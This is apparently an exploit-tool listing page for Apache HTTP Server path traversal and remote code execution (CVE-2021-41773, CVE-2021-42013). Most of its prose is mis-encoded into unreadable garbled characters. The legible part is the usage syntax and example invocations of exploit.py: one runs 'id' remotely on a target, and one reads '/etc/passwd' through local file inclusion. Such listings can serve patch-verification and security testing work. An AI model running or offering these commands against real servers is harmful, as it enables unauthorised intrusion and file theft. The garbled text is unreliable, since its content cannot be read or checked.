## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-R0OTK3R-CVE-2021-41773
# Apache рдкрд╛рде рдЯреНрд░реИрд╡рд░реНрд╕рд▓ рдФрд░ RCE рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ
**CVE-2021-41773 рдФрд░ CVE-2021-42013**
рдпреЗ рдЧрдВрднреАрд░ рдкрд╛рде рдЯреНрд░реИрд╡рд░реНрд╕рд▓ рднреЗрджреНрдпрддрд╛рдПрдБ рд╣реИрдВ рдЬреЛ **Apache HTTP Server 2.4.49** рдФрд░ **2.4.50** рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░рддреА рд╣реИрдВред
рдпреЗ рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ рдирд┐рдореНрди рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИрдВ:
* рд╡реЗрдм рд░реВрдЯ рдХреЗ рдмрд╛рд╣рд░ рдХреА рдлрд╝рд╛рдЗрд▓реЛрдВ рддрдХ рдкрд╣реБрдБрдЪ (LFI)
* Remote Code Execution (RCE) рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ рдпрджрд┐ CGI рд╕рдХреНрд╖рдо рд╣реИ
рджреЛрдиреЛрдВ рднреЗрджреНрдпрддрд╛рдПрдБ **Apache 2.4.51 рдореЗрдВ рдкреИрдЪ рдХреА рдЧрдИ рд╣реИрдВ** ред
**рддрддреНрдХрд╛рд▓ рдЕрдкрдЧреНрд░реЗрдб рдХрд░рдиреЗ рдХреА рджреГрдврд╝рддрд╛ рд╕реЗ рдЕрдиреБрд╢рдВрд╕рд╛ рдХреА рдЬрд╛рддреА рд╣реИред**
* * *
## рдЙрдкрдпреЛрдЧ
root@kitploit:~
python3 exploit.py --url <TARGET> --port [PORT] (--rce --command "COMMAND" | --lfi --path "/path/to/file")
рдЙрджрд╛рд╣рд░рдг
* Remote Code Execution:
root@kitploit:~
python3 exploit.py --url http://192.168.1.10 --rce --command "id"

* Local File Inclusion:
root@kitploit:~
python3 exploit.py --url http://192.168.1.10 --lfi --path "/etc/passwd"